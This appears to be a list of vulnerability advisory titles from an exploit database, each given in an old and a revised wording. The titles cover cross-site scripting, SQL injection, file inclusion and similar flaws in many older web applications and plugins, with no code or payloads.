123 Flash Chat = Multiple Security Vulnerabilities

CompuCMS - Multiple SQL Injection and Cross-Site Scripting Vulnerabilities
CompuCMS - Multiple SQL Injection / Cross-Site Scripting Vulnerabilities

Briefcase 4.0 iOS - Code Execution & File Include
Briefcase 4.0 iOS - Code Execution / File Include

Million Dollar Pixel Ads Cross-Site Scripting and SQL Injection
Million Dollar Pixel Ads Cross-Site Scripting / SQL Injection

PluXml 5.0.1 - Multiple Cross-Site Scripting and HTML Injection Vulnerabilities
PluXml 5.0.1 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities

AdvertisementManager 3.1 - 'req' Parameter Local and Remote File Inclusion
AdvertisementManager 3.1 - 'req' Parameter Local File Inclusion / Remote File Inclusion

CMS WebManager-Pro 7.4.3 - Cross-Site Scripting and SQL Injection
CMS WebManager-Pro 7.4.3 - Cross-Site Scripting / SQL Injection

Centreon SQL and Command Injection
Centreon - SQL Injection / Command Injection

net2ftp 0.98 - (stable) 'admin1.template.php' Local and Remote File Inclusion
net2ftp 0.98 - (stable) 'admin1.template.php' Local File Inclusion / Remote File Inclusion

PHP TopSites 2.1 - 'rate.php' Cross-Site Scripting and SQL Injection
PHP TopSites 2.1 - 'rate.php' Cross-Site Scripting / SQL Injection

BLOG:CMS 4.2.1 e Multiple HTML Injection and Cross-Site Scripting Vulnerabilities
BLOG:CMS 4.2.1 e - Multiple HTML Injection / Cross-Site Scripting

Modx CMS 2.2.14 - CSRF Bypass & Reflected XSS & Stored XSS
Modx CMS 2.2.14 - CSRF Bypass / Reflected XSS / Stored XSS

BlogEngine.NET 1.6 - Directory Traversal and Information Disclosure
BlogEngine.NET 1.6 - Directory Traversal / Information Disclosure

TinyWebGallery 1.8.3 - Cross-Site Scripting and Local File Inclusion
TinyWebGallery 1.8.3 - Cross-Site Scripting / Local File Inclusion

Batavi 1.0 - Multiple Local File Inclusion and Cross-Site Scripting Vulnerabilities
Batavi 1.0 - Multiple Local File Inclusion / Cross-Site Scripting Vulnerabilities

1 Flash Gallery WordPress Plugin 0.2.5 - Cross-Site Scripting and SQL Injection
1 Flash Gallery WordPress Plugin 0.2.5 - Cross-Site Scripting / SQL Injection

CosmoShop 10.05.00 - Multiple Cross-Site Scripting and SQL Injection
CosmoShop 10.05.00 - Multiple Cross-Site Scripting / SQL Injection

Anantasoft Gazelle CMS 1.0 - Cross-Site Scripting and SQL Injection
Anantasoft Gazelle CMS 1.0 - Cross-Site Scripting / SQL Injection

Online store php script Multiple Cross-Site Scripting and SQL Injection
Online store php script Multiple Cross-Site Scripting / SQL Injection

Ripe Website Manager 1.1 - Cross-Site Scripting and Multiple SQL Injection
Ripe Website Manager 1.1 - Cross-Site Scripting / Multiple SQL Injection

Cetera eCommerce Multiple Cross-Site Scripting and SQL Injection
Cetera eCommerce Multiple Cross-Site Scripting / SQL Injection

osCSS 2.1 - Cross-Site Scripting and Multiple Local File Inclusion
osCSS 2.1 - Cross-Site Scripting / Multiple Local File Inclusion

CIK Telecom VoIP router SVG6000RW - Privilege Escalation and Command Execution
CIK Telecom VoIP router SVG6000RW - Privilege Escalation / Command Execution

Spellchecker Plugin 3.1 for WordPress - 'general.php' Local and Remote File Inclusion
Spellchecker Plugin 3.1 for WordPress - 'general.php' Local File Inclusion / Remote File Inclusion

PhoenixCMS 1.7 - Local File Inclusion and SQL Injection
PhoenixCMS 1.7 - Local File Inclusion / SQL Injection

4Images 1.7.9 - Multiple Remote File Inclusion and SQL Injection
4Images 1.7.9 - Multiple Remote File Inclusions / SQL Injection

Sermon Browser WordPress Plugin 0.43 - Cross-Site Scripting and SQL Injection
Sermon Browser WordPress Plugin 0.43 - Cross-Site Scripting / SQL Injection

Nuke Evolution Xtreme 2.0 - Local File Inclusion and SQL Injection
Nuke Evolution Xtreme 2.0 - Local File Inclusion / SQL Injection
Tine 2.0 - 'vbook.php' Cross Site Scripting
LANSA aXes Web Terminal TN5250 - 'axes_default.css' Cross Site Scripting
LDAP Account Manager 3.4.0 selfserviceSaveOk Parameter Cross Site Scripting
Tine 2.0 - 'vbook.php' Cross-Site Scripting
LANSA aXes Web Terminal TN5250 - 'axes_default.css' Cross-Site Scripting
LDAP Account Manager 3.4.0 selfserviceSaveOk Parameter Cross-Site Scripting
E2 Photo Gallery 0.9 - 'index.php' Cross Site Scripting
YaPIG 0.95 Multiple Cross Site Scripting Vulnerabilities
Web Auction 0.3.6 'lang' Parameter Cross Site Scripting
Proofpoint Protection Server 5.5.5 - 'process.cgi' Cross Site Scripting
E2 Photo Gallery 0.9 - 'index.php' Cross-Site Scripting
YaPIG 0.95 - Multiple Cross-Site Scripting Vulnerabilities
Web Auction 0.3.6 'lang' Parameter Cross-Site Scripting
Proofpoint Protection Server 5.5.5 - 'process.cgi' Cross-Site Scripting
SelectaPix 1.4.1 - 'uploadername' Parameter Cross Site Scripting
Multiple GoT.MY Products 'theme_dir' Parameter Cross Site Scripting
SelectaPix 1.4.1 - 'uploadername' Parameter Cross-Site Scripting
Multiple GoT.MY Products 'theme_dir' Parameter Cross-Site Scripting
WP Ajax Calendar 1.0 - 'example.php' Cross Site Scripting
PHP Directory Listing Script 3.1 - 'index.php' Cross Site Scripting
BMC Remedy Knowledge Management 7.5.00 Default Account and Multiple Cross Site Scripting Vulnerabilities
BMC Dashboards 7.6.01 - Cross Site Scripting / Information Disclosure
PHPDug 2.0 Multiple Cross Site Scripting Vulnerabilities
WP Ajax Calendar 1.0 - 'example.php' Cross-Site Scripting
PHP Directory Listing Script 3.1 - 'index.php' Cross-Site Scripting
BMC Remedy Knowledge Management 7.5.00 Default Account and Multiple Cross-Site Scripting Vulnerabilities
BMC Dashboards 7.6.01 - Cross-Site Scripting / Information Disclosure
PHPDug 2.0 - Multiple Cross-Site Scripting Vulnerabilities
encoder 0.4.10 - 'edit.php' Cross Site Scripting
Ampache 3.5.4 - 'login.php' Cross Site Scripting
encoder 0.4.10 - 'edit.php' Cross-Site Scripting
Ampache 3.5.4 - 'login.php' Cross-Site Scripting

Gelsheet 1.02 - 'index.php' Cross Site Scripting
Gelsheet 1.02 - 'index.php' Cross-Site Scripting

Perl 5.10 Multiple NULL Pointer Dereference Denial Of Service Vulnerabilities
Perl 5.10 - Multiple NULL Pointer Dereference Denial Of Service Vulnerabilities

Keyfax Customer Response Management 3.2.2.6 Multiple Cross Site Scripting Vulnerabilities
Keyfax Customer Response Management 3.2.2.6 - Multiple Cross-Site Scripting Vulnerabilities

Pandora 3.1 - Auth Bypass and Arbitrary File Upload
Pandora 3.1 - Auth Bypass / Arbitrary File Upload
Apache Struts 2.0.0 <= 2.2.1.1 - XWork 's:submit' HTML Tag Cross Site Scripting
poMMo Aardvark PR16.1 Multiple Cross Site Scripting Vulnerabilities
Calendarix 0.8.20080808 Multiple Cross Site Scripting and SQL Injection
Apache Struts 2.0.0 <= 2.2.1.1 - XWork 's:submit' HTML Tag Cross-Site Scripting
poMMo Aardvark PR16.1 - Multiple Cross-Site Scripting Vulnerabilities
Calendarix 0.8.20080808 - Multiple Cross-Site Scripting and SQL Injection

Argyle Social Multiple Cross Site Scripting Vulnerabilities
Argyle Social - Multiple Cross-Site Scripting Vulnerabilities

Mitel Audio and Web Conferencing 4.4.3.0 Multiple Cross Site Scripting Vulnerabilities
Mitel Audio and Web Conferencing 4.4.3.0 - Multiple Cross-Site Scripting Vulnerabilities
allocPSA 1.7.4 - 'login/login.php' Cross Site Scripting
DocMGR 1.1.2 - 'history.php' Cross Site Scripting
openQRM 4.8 - 'source_tab' Parameter Cross Site Scripting
allocPSA 1.7.4 - 'login/login.php' Cross-Site Scripting
DocMGR 1.1.2 - 'history.php' Cross-Site Scripting
openQRM 4.8 - 'source_tab' Parameter Cross-Site Scripting
eFront 3.6.9 - 'submitScore.php' Cross Site Scripting
PHP Calendar Basic 2.3 Multiple Cross Site Scripting Vulnerabilities
TWiki 5.0.1 - 'origurl' Parameter Cross Site Scripting
eFront 3.6.9 - 'submitScore.php' Cross-Site Scripting
PHP Calendar Basic 2.3 - Multiple Cross-Site Scripting Vulnerabilities
TWiki 5.0.1 - 'origurl' Parameter Cross-Site Scripting
CiscoWorks Common Services Framework 3.1.1 Help Servlet Cross Site Scripting
Cisco Unified Operations Manager 8.5 Common Services Device Center Cross Site Scripting
CiscoWorks Common Services Framework 3.1.1 Help Servlet Cross-Site Scripting
Cisco Unified Operations Manager 8.5 Common Services Device Center Cross-Site Scripting

Room Juice 0.3.3 - 'display.php' Cross Site Scripting
Room Juice 0.3.3 - 'display.php' Cross-Site Scripting

LimeSurvey 1.85+ 'admin.php' Cross Site Scripting
LimeSurvey 1.85+ 'admin.php' Cross-Site Scripting

phpScheduleIt 1.2.12 Multiple Cross Site Scripting Vulnerabilities
phpScheduleIt 1.2.12 - Multiple Cross-Site Scripting Vulnerabilities
Ajax Chat 1.0 - 'ajax-chat.php' Cross Site Scripting
Gadu-Gadu Instant Messenger 6.0 File Transfer Cross Site Scripting
Ajax Chat 1.0 - 'ajax-chat.php' Cross-Site Scripting
Gadu-Gadu Instant Messenger 6.0 File Transfer Cross-Site Scripting

Cotonti 0.9.2 Multiple SQL Injection
Cotonti 0.9.2 - Multiple SQL Injection

Kryn.cms 0.9 - '_kurl' Parameter Cross Site Scripting
Kryn.cms 0.9 - '_kurl' Parameter Cross-Site Scripting

Blackboard Learn 8.0 - 'keywordraw' Parameter Cross Site Scripting
Blackboard Learn 8.0 - 'keywordraw' Parameter Cross-Site Scripting
Kentico CMS 5.5R2.23 - 'userContextMenu_parameter' Parameter Cross Site Scripting
Serendipity Freetag-plugin 3.21 - 'index.php' Cross Site Scripting
Kentico CMS 5.5R2.23 - 'userContextMenu_parameter' Parameter Cross-Site Scripting
Serendipity Freetag-plugin 3.21 - 'index.php' Cross-Site Scripting

ARSC Really Simple Chat 3.3-rc2 - Cross Site Scripting and Multiple SQL Injection
ARSC Really Simple Chat 3.3-rc2 - Cross-Site Scripting / Multiple SQL Injection

Nagios 3.2.3 - 'expand' Parameter Cross Site Scripting
Nagios 3.2.3 - 'expand' Parameter Cross-Site Scripting

vBulletin vBExperience 3 - 'sortorder' Parameter Cross Site Scripting
vBulletin vBExperience 3 - 'sortorder' Parameter Cross-Site Scripting
Nakid CMS 1.0.2 - 'CKEditorFuncNum' Parameter Cross Site Scripting
Multiple WordPress WooThemes - 'test.php' Cross Site Scripting
Nakid CMS 1.0.2 - 'CKEditorFuncNum' Parameter Cross-Site Scripting
Multiple WordPress WooThemes - 'test.php' Cross-Site Scripting

Squiz Matrix 4 - 'colour_picker.php' Cross Site Scripting
Squiz Matrix 4 - 'colour_picker.php' Cross-Site Scripting

BLOG:CMS 4.2 Multiple Cross Site Scripting Vulnerabilities
BLOG:CMS 4.2 - Multiple Cross-Site Scripting Vulnerabilities

The Pacer Edition CMS 2.1 - 'email' Parameter Cross Site Scripting
The Pacer Edition CMS 2.1 - 'email' Parameter Cross-Site Scripting
vBTube 1.2.9 - 'vBTube.php' Multiple Cross Site Scripting Vulnerabilities
miniblog 1.0 Multiple Cross Site Scripting Vulnerabilities
vBTube 1.2.9 - 'vBTube.php' Multiple Cross-Site Scripting Vulnerabilities
miniblog 1.0 - Multiple Cross-Site Scripting Vulnerabilities

Sunway ForceControl 6.1 Multiple Heap Based Buffer Overflow Vulnerabilities
Sunway ForceControl 6.1 - Multiple Heap Based Buffer Overflow Vulnerabilities
Immophp 1.1.1 Cross Site Scripting and SQL Injection
Taha Portal 3.2 - 'sitemap.php' Cross Site Scripting
Immophp 1.1.1 Cross-Site Scripting and SQL Injection
Taha Portal 3.2 - 'sitemap.php' Cross-Site Scripting

Sitemagic CMS 2010.04.17 - 'SMExt' Parameter Cross Site Scripting
Sitemagic CMS 2010.04.17 - 'SMExt' Parameter Cross-Site Scripting

FanUpdate 3.0 - 'pageTitle' Parameter Cross Site Scripting
FanUpdate 3.0 - 'pageTitle' Parameter Cross-Site Scripting

ecommerceMajor - SQL Injection And Authentication bypass
ecommerceMajor - SQL Injection / Authentication bypass

Mambo CMS 4.6.x Multiple Cross Site Scripting Vulnerabilities
Mambo CMS 4.6.x Multiple Cross-Site Scripting Vulnerabilities

Joomla! CMS 1.6.3 Multiple Cross Site Scripting Vulnerabilities
Joomla! CMS 1.6.3 - Multiple Cross-Site Scripting Vulnerabilities

FlatPress 0.1010.1 Multiple Cross Site Scripting Vulnerabilities
FlatPress 0.1010.1 - Multiple Cross-Site Scripting Vulnerabilities

webERP 4.3.8 Multiple Script URI XSS
webERP 4.3.8 - Multiple Script URI XSS

PHPJunkYard GBook 1.6/1.7 Multiple Cross Site Scripting Vulnerabilities
PHPJunkYard GBook 1.6/1.7 - Multiple Cross-Site Scripting Vulnerabilities

WebCalendar 1.2.3 Multiple Cross Site Scripting Vulnerabilities
WebCalendar 1.2.3 - Multiple Cross-Site Scripting Vulnerabilities

Paliz Portal Cross Site Scripting and Multiple SQL Injection
Paliz Portal Cross-Site Scripting and Multiple SQL Injection

Classified Script c-BrowseClassified URL Cross Site Scripting
Classified Script c-BrowseClassified URL Cross-Site Scripting

Prontus CMS 'page' Parameter Cross Site Scripting
Prontus CMS 'page' Parameter Cross-Site Scripting

Alice Modem 1111 - 'rulename' Parameter Cross Site Scripting / Denial of Service
Alice Modem 1111 - 'rulename' Parameter Cross-Site Scripting / Denial of Service
Flowplayer 3.2.7 linkUrl' Parameter Cross Site Scripting
TCExam 11.2.x Multiple Cross Site Scripting Vulnerabilities
Flowplayer 3.2.7 linkUrl' Parameter Cross-Site Scripting
TCExam 11.2.x Multiple Cross-Site Scripting Vulnerabilities

Joomla! 'com_resman' Component Cross Site Scripting
Joomla! 'com_resman' Component Cross-Site Scripting
Joomla! 1.6.5 and Prior Multiple Cross Site Scripting Vulnerabilities
Tiki Wiki CMS Groupware 7.2 - 'snarf_ajax.php' Cross Site Scripting
Cyberoam UTM Multiple Cross Site Scripting Vulnerabilities
Joomla! 1.6.5 and Prior Multiple Cross-Site Scripting Vulnerabilities
Tiki Wiki CMS Groupware 7.2 - 'snarf_ajax.php' Cross-Site Scripting
Cyberoam UTM Multiple Cross-Site Scripting Vulnerabilities

Online Grades 3.2.5 Multiple Cross Site Scripting Vulnerabilities
Online Grades 3.2.5 - Multiple Cross-Site Scripting Vulnerabilities

Curverider Elgg 1.7.9 Multiple Cross Site Scripting Vulnerabilities
Curverider Elgg 1.7.9 - Multiple Cross-Site Scripting Vulnerabilities
mt LinkDatenbank 'b' Parameter Cross Site Scripting
BESNI OKUL PORTAL 'sayfa.asp' Cross Site Scripting
mt LinkDatenbank 'b' Parameter Cross-Site Scripting
BESNI OKUL PORTAL 'sayfa.asp' Cross-Site Scripting
HESK 2.2 Multiple Cross Site Scripting Vulnerabilities
WordPress WP e-Commerce Plugin 3.8.6 - 'cart_messages[]' Parameter Cross Site Scripting
Community Server 2007/2008 - 'TagSelector.aspx' Cross Site Scripting
Microsoft Visual Studio Report Viewer 2005 Control Multiple Cross Site Scripting Vulnerabilities
HESK 2.2 - Multiple Cross-Site Scripting Vulnerabilities
WordPress WP e-Commerce Plugin 3.8.6 - 'cart_messages[]' Parameter Cross-Site Scripting
Community Server 2007/2008 - 'TagSelector.aspx' Cross-Site Scripting
Microsoft Visual Studio Report Viewer 2005 Control Multiple Cross-Site Scripting Vulnerabilities

u5CMS 3.9.3 - Multiple Stored And Reflected XSS Vulnerabilities
u5CMS 3.9.3 - Multiple Stored XSS / Reflected XSS Vulnerabilities
Softbiz Recipes Portal Script Multiple Cross Site Scripting Vulnerabilities
Search Network 2.0 - 'query' Parameter Cross Site Scripting
OpenEMR 4.0 Multiple Cross Site Scripting Vulnerabilities
Softbiz Recipes Portal Script Multiple Cross-Site Scripting Vulnerabilities
Search Network 2.0 - 'query' Parameter Cross-Site Scripting
OpenEMR 4.0 - Multiple Cross-Site Scripting Vulnerabilities

WordPress eShop Plugin 6.2.8 - Multiple Cross Site Scripting Vulnerabilities
WordPress eShop Plugin 6.2.8 - Multiple Cross-Site Scripting Vulnerabilities
SurgeFTP 23b6 Multiple Cross Site Scripting Vulnerabilities
phpWebSite 'page_id' Parameter Cross Site Scripting
awiki 20100125 Multiple Local File Inclusion
SurgeFTP 23b6 - Multiple Cross-Site Scripting Vulnerabilities
phpWebSite 'page_id' Parameter Cross-Site Scripting
awiki 20100125 - Multiple Local File Inclusion
WordPress Fast Secure Contact Form 3.0.3.1 - 'index.php' Cross Site Scripting
WordPress WP-Stats-Dashboard Plugin 2.6.5.1 - Multiple Cross Site Scripting Vulnerabilities
WordPress Fast Secure Contact Form 3.0.3.1 - 'index.php' Cross-Site Scripting
WordPress WP-Stats-Dashboard Plugin 2.6.5.1 - Multiple Cross-Site Scripting Vulnerabilities

PHP Prior to 5.3.7 Multiple NULL Pointer Dereference Denial Of Service Vulnerabilities
PHP Prior to 5.3.7 - Multiple NULL Pointer Dereference Denial Of Service Vulnerabilities
Adobe ColdFusion - 'probe.cfm' Cross Site Scripting
MantisBT 1.1.8 Cross Site Scripting and SQL Injection
Adobe ColdFusion - 'probe.cfm' Cross-Site Scripting
MantisBT 1.1.8 Cross-Site Scripting and SQL Injection
OneFileCMS 1.1.1 - 'onefilecms.php' Cross Site Scripting
Pandora FMS 3.x - 'index.php' Cross Site Scripting
OneFileCMS 1.1.1 - 'onefilecms.php' Cross-Site Scripting
Pandora FMS 3.x - 'index.php' Cross-Site Scripting
Concrete 5.4.1 1 - 'rcID' Parameter Cross Site Scripting
Open Classifieds 1.7.2 Multiple Cross Site Scripting Vulnerabilities
Concrete 5.4.1 1 - 'rcID' Parameter Cross-Site Scripting
Open Classifieds 1.7.2 - Multiple Cross-Site Scripting Vulnerabilities

WonderPlugin Audio Player 2.0 - Blind SQL Injection and XSS
WonderPlugin Audio Player 2.0 - Blind SQL Injection / XSS

IBM Open Admin Tool 2.71 Multiple Cross Site Scripting Vulnerabilities
IBM Open Admin Tool 2.71 - Multiple Cross-Site Scripting Vulnerabilities

Mambo CMS N-Skyrslur Cross Site Scripting
Mambo CMS N-Skyrslur Cross-Site Scripting

GuppY CMS 5.0.9 & 5.00.10 Multiple CSRF Vulnerabilities
GuppY CMS 5.0.9 & 5.00.10 - Multiple CSRF Vulnerabilities

ACal 2.2.6 'calendar.php' Cross Site Scripting
ACal 2.2.6 'calendar.php' Cross-Site Scripting

YABSoft Advanced Image Hosting Script 2.3 - 'report.php' Cross Site Scripting
YABSoft Advanced Image Hosting Script 2.3 - 'report.php' Cross-Site Scripting
Kisanji 'gr' Parameter Cross Site Scripting
GeoClassifieds Lite 2.0.x Multiple Cross Site Scripting and SQL Injection
Kisanji 'gr' Parameter Cross-Site Scripting
GeoClassifieds Lite 2.0.x Multiple Cross-Site Scripting and SQL Injection
Zikula Application Framework 1.2.7/1.3 - 'themename' Parameter Cross Site Scripting
SkaDate 'blogs.php' Cross Site Scripting
Zikula Application Framework 1.2.7/1.3 - 'themename' Parameter Cross-Site Scripting
SkaDate 'blogs.php' Cross-Site Scripting

Pluck 4.7 Multiple Local File Inclusion and File Disclosure Vulnerabilities
Pluck 4.7 - Multiple Local File Inclusion and File Disclosure Vulnerabilities

Papoo CMS Light 4.0 Multiple Cross Site Scripting Vulnerabilities
Papoo CMS Light 4.0 - Multiple Cross-Site Scripting Vulnerabilities

Orion Network Performance Monitor 10.1.3 - 'CustomChart.aspx' Cross Site Scripting
Orion Network Performance Monitor 10.1.3 - 'CustomChart.aspx' Cross-Site Scripting

PunBB 1.3.5 Multiple Cross-Site Scripting Vulnerabilities
PunBB 1.3.5 - Multiple Cross-Site Scripting Vulnerabilities
Toko LiteCMS 1.5.2 - HTTP Response Splitting / Cross Site Scripting
Aspgwy Access 1.0 - 'matchword' Parameter Cross Site Scripting
net4visions Multiple Products - 'dir' parameters Multiple Cross Site Scripting Vulnerabilities
Toko LiteCMS 1.5.2 - HTTP Response Splitting / Cross-Site Scripting
Aspgwy Access 1.0 - 'matchword' Parameter Cross-Site Scripting
net4visions Multiple Products - 'dir' parameters Multiple Cross-Site Scripting Vulnerabilities

Card sharj 1.0 Multiple SQL Injection
Card sharj 1.0 - Multiple SQL Injection
i-Gallery 3.4 - 'd' Parameter Cross Site Scripting
Free Help Desk 1.1b Multiple Input Validation Vulnerabilities
phpRS 2.8.1 Multiple SQL Injection and Cross Site Scripting Vulnerabilities
OneCMS 2.6.4 Multiple SQL Injection
Zyncro 3.0.1.20 Multiple HTML Injection Vulnerabilities
i-Gallery 3.4 - 'd' Parameter Cross-Site Scripting
Free Help Desk 1.1b - Multiple Input Validation Vulnerabilities
phpRS 2.8.1 - Multiple SQL Injection / Cross-Site Scripting
OneCMS 2.6.4 - Multiple SQL Injection
Zyncro 3.0.1.20 - Multiple HTML Injection Vulnerabilities
AdaptCMS 2.0.1 - Cross Site Scripting / Information Disclosure
Serendipity Freetag-plugin 3.23 - 'serendipity[tagview]' Cross Site Scripting
AdaptCMS 2.0.1 - Cross-Site Scripting / Information Disclosure
Serendipity Freetag-plugin 3.23 - 'serendipity[tagview]' Cross-Site Scripting

Adobe ColdFusion 7 - Multiple Cross Site Scripting Vulnerabilities
Adobe ColdFusion 7 - Multiple Cross-Site Scripting Vulnerabilities
Traq 2.2 Multiple SQL Injection and Cross Site Scripting Vulnerabilities
Joomla! 1.7.0 and Prior Multiple Cross Site Scripting Vulnerabilities
Bitweaver 2.8.1 Multiple Cross-Site Scripting Vulnerabilities
WordPress Atahualpa Theme 3.6.7 - 's' Parameter Cross Site Scripting
WordPress Hybrid Theme 0.9 - 'cpage' Parameter Cross Site Scripting
WordPress F8 Lite Theme 4.2.1 - 's' Parameter Cross Site Scripting
WordPress Elegant Grunge Theme 1.0.3 - 's' Parameter Cross Site Scripting
WordPress EvoLve Theme 1.2.5 - 's' Parameter Cross Site Scripting
WordPress Cover WP Theme 1.6.5 - 's' Parameter Cross Site Scripting
WordPress Web Minimalist Theme 1.1 - 'index.php' Cross Site Scripting
WordPress Pixiv Custom Theme 2.1.5 - 'cpage' Parameter Cross Site Scripting
WordPress Morning Coffee Theme 3.5 - 'index.php' Cross Site Scripting
WordPress Black-LetterHead Theme 1.5 - 'index.php' Cross Site Scripting
Traq 2.2 - Multiple SQL Injection / Cross-Site Scripting
Joomla! 1.7.0 and Prior Multiple Cross-Site Scripting Vulnerabilities
Bitweaver 2.8.1 - Multiple Cross-Site Scripting Vulnerabilities
WordPress Atahualpa Theme 3.6.7 - 's' Parameter Cross-Site Scripting
WordPress Hybrid Theme 0.9 - 'cpage' Parameter Cross-Site Scripting
WordPress F8 Lite Theme 4.2.1 - 's' Parameter Cross-Site Scripting
WordPress Elegant Grunge Theme 1.0.3 - 's' Parameter Cross-Site Scripting
WordPress EvoLve Theme 1.2.5 - 's' Parameter Cross-Site Scripting
WordPress Cover WP Theme 1.6.5 - 's' Parameter Cross-Site Scripting
WordPress Web Minimalist Theme 1.1 - 'index.php' Cross-Site Scripting
WordPress Pixiv Custom Theme 2.1.5 - 'cpage' Parameter Cross-Site Scripting
WordPress Morning Coffee Theme 3.5 - 'index.php' Cross-Site Scripting
WordPress Black-LetterHead Theme 1.5 - 'index.php' Cross-Site Scripting

WordPress RedLine Theme 1.65 - 's' Parameter Cross Site Scripting
WordPress RedLine Theme 1.65 - 's' Parameter Cross-Site Scripting

WordPress Trending 0.1 - 'cpage' Parameter Cross Site Scripting
WordPress Trending 0.1 - 'cpage' Parameter Cross-Site Scripting
Innovate Portal 2.0 - 'cat' Parameter Cross Site Scripting
Active CMS 1.2 - 'mod' Parameter Cross Site Scripting
Innovate Portal 2.0 - 'cat' Parameter Cross-Site Scripting
Active CMS 1.2 - 'mod' Parameter Cross-Site Scripting

Jaws 0.8.14 Multiple Remote File Inclusion
Jaws 0.8.14 - Multiple Remote File Inclusion

6KBBS 8.0 build 20101201 - Cross Site Scripting / Information Disclosure
6KBBS 8.0 build 20101201 - Cross-Site Scripting / Information Disclosure

SilverStripe 2.4.5 Multiple Cross-Site Scripting Vulnerabilities
SilverStripe 2.4.5 - Multiple Cross-Site Scripting Vulnerabilities

BugFree 2.1.3 Multiple Cross Site Scripting Vulnerabilities
BugFree 2.1.3 - Multiple Cross-Site Scripting Vulnerabilities

WordPress Pretty Link Plugin 1.4.56 - Multiple Cross Site Scripting Vulnerabilities
WordPress Pretty Link Plugin 1.4.56 - Multiple Cross-Site Scripting Vulnerabilities
PROMOTIC 8.1.3 Multiple Security Vulnerabilities
Xenon 'id' Parameter Multiple SQL Injection
asgbookphp 1.9 - 'index.php' Cross Site Scripting
PROMOTIC 8.1.3 - Multiple Security Vulnerabilities
Xenon - 'id' Parameter Multiple SQL Injection
asgbookphp 1.9 - 'index.php' Cross-Site Scripting
Check Point UTM-1 Edge and Safe 8.2.43 Multiple Security Vulnerabilities
Site@School 2.4.10 - 'index.php' Cross Site Scripting and SQL Injection
Check Point UTM-1 Edge and Safe 8.2.43 - Multiple Security Vulnerabilities
Site@School 2.4.10 - 'index.php' Cross-Site Scripting / SQL Injection

WordPress Theme Photocrati 4.x.x - SQL Injection & XSS
WordPress Theme Photocrati 4.x.x - SQL Injection / XSS

Splunk 4.1.6 'segment' Parameter Cross Site Scripting
Splunk 4.1.6 'segment' Parameter Cross-Site Scripting
osCommerce - Remote File Upload and File Disclosure
Tine 2.0 Multiple Cross Site Scripting Vulnerabilities
osCommerce - Remote File Upload / File Disclosure
Tine 2.0 - Multiple Cross-Site Scripting Vulnerabilities
InverseFlow 2.4 Multiple Cross Site Scripting Vulnerabilities
Alsbtain Bulletin 1.5/1.6 Multiple Local File Inclusion
vtiger CRM 5.2.1 - 'index.php' Multiple Cross Site Scripting Vulnerabilities
InverseFlow 2.4 - Multiple Cross-Site Scripting Vulnerabilities
Alsbtain Bulletin 1.5/1.6 - Multiple Local File Inclusion
vtiger CRM 5.2.1 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities

XAMPP 1.7.4 Multiple Cross Site Scripting Vulnerabilities
XAMPP 1.7.4 - Multiple Cross-Site Scripting Vulnerabilities

Plici Search 2.0.0.Stable.r.1878 - 'p48-search.html' Cross Site Scripting
Plici Search 2.0.0.Stable.r.1878 - 'p48-search.html' Cross-Site Scripting
Domain Shop 'index.php' Cross Site Scripting
vBulletin 4.1.7 Multiple Remote File Inclusion
Domain Shop 'index.php' Cross-Site Scripting
vBulletin 4.1.7 - Multiple Remote File Inclusion

Hyperic HQ Enterprise 4.5.1 Cross Site Scripting and Multiple Unspecified Security Vulnerabilities
Hyperic HQ Enterprise 4.5.1 Cross-Site Scripting and Multiple Unspecified Security Vulnerabilities
IBSng B1.34(T96) 'str' Parameter Cross Site Scripting
eFront 3.6.10 Build 11944 Multiple Cross Site Scripting Vulnerabilities
eFront 3.6.x Multiple Cross Site Scripting and SQL Injection
Serendipity 1.5.5 - 'serendipity[filter][bp.ALT]' Parameter Cross Site Scripting
IBSng B1.34(T96) 'str' Parameter Cross-Site Scripting
eFront 3.6.10 Build 11944 - Multiple Cross-Site Scripting Vulnerabilities
eFront 3.6.x Multiple Cross-Site Scripting and SQL Injection
Serendipity 1.5.5 - 'serendipity[filter][bp.ALT]' Parameter Cross-Site Scripting

CmyDocument Multiple Cross Site Scripting Vulnerabilities
CmyDocument Multiple Cross-Site Scripting Vulnerabilities

WordPress Bonus Theme 1.0 - 's' Parameter Cross Site Scripting
WordPress Bonus Theme 1.0 - 's' Parameter Cross-Site Scripting

SmartJobBoard 'keywords' Parameter Cross Site Scripting
SmartJobBoard 'keywords' Parameter Cross-Site Scripting

XAMPP 1.7.7 - 'PHP_SELF' Variable Multiple Cross Site Scripting Vulnerabilities
XAMPP 1.7.7 - 'PHP_SELF' Variable Multiple Cross-Site Scripting Vulnerabilities
AShop - Open-Redirection / Cross Site Scripting
Joomla! 1.9.3 - 'com_alfcontact' Extension Multiple Cross Site Scripting Vulnerabilities
Infoblox NetMRI 6.2.1 Admin Login Page Multiple Cross Site Scripting Vulnerabilities
AShop - Open-Redirection / Cross-Site Scripting
Joomla! 1.9.3 - 'com_alfcontact' Extension Multiple Cross-Site Scripting Vulnerabilities
Infoblox NetMRI 6.2.1 Admin Login Page Multiple Cross-Site Scripting Vulnerabilities

PHP Betoffice (Betster) 1.0.4 - Authentication Bypass And SQL Injection
PHP Betoffice (Betster) 1.0.4 - Authentication Bypass / SQL Injection
ZOHO ManageEngine ADSelfService Plus 4.5 Build 4521 Cross Site Scripting
WordPress Flexible Custom Post Type plugin - 'id' Parameter Cross Site Scripting
ZOHO ManageEngine ADSelfService Plus 4.5 Build 4521 Cross-Site Scripting
WordPress Flexible Custom Post Type plugin - 'id' Parameter Cross-Site Scripting

GoAhead WebServer 2.5 - 'goform/formTest' Multiple Cross Site Scripting Vulnerabilities
GoAhead WebServer 2.5 - 'goform/formTest' Multiple Cross-Site Scripting Vulnerabilities
WordPress Alert Before Your Post Plugin - 'name' Parameter Cross Site Scripting
WordPress Advanced Text Widget Plugin 2.0 - 'page' Parameter Cross Site Scripting
WordPress Adminimize Plugin 1.7.21 - 'page' Parameter Cross Site Scripting
WordPress Lanoba Social Plugin 1.0 - 'action' Parameter Cross Site Scripting
WordPress Alert Before Your Post Plugin - 'name' Parameter Cross-Site Scripting
WordPress Advanced Text Widget Plugin 2.0 - 'page' Parameter Cross-Site Scripting
WordPress Adminimize Plugin 1.7.21 - 'page' Parameter Cross-Site Scripting
WordPress Lanoba Social Plugin 1.0 - 'action' Parameter Cross-Site Scripting
WordPress ClickDesk Live Support Plugin 2.0 - 'cdwidget' Parameter Cross Site Scripting
WordPress Featurific For WordPress Plugin 1.6.2 - 'snum' Parameter Cross Site Scripting
WordPress Newsletter Meenews Plugin 5.1 - 'idnews' Parameter Cross Site Scripting
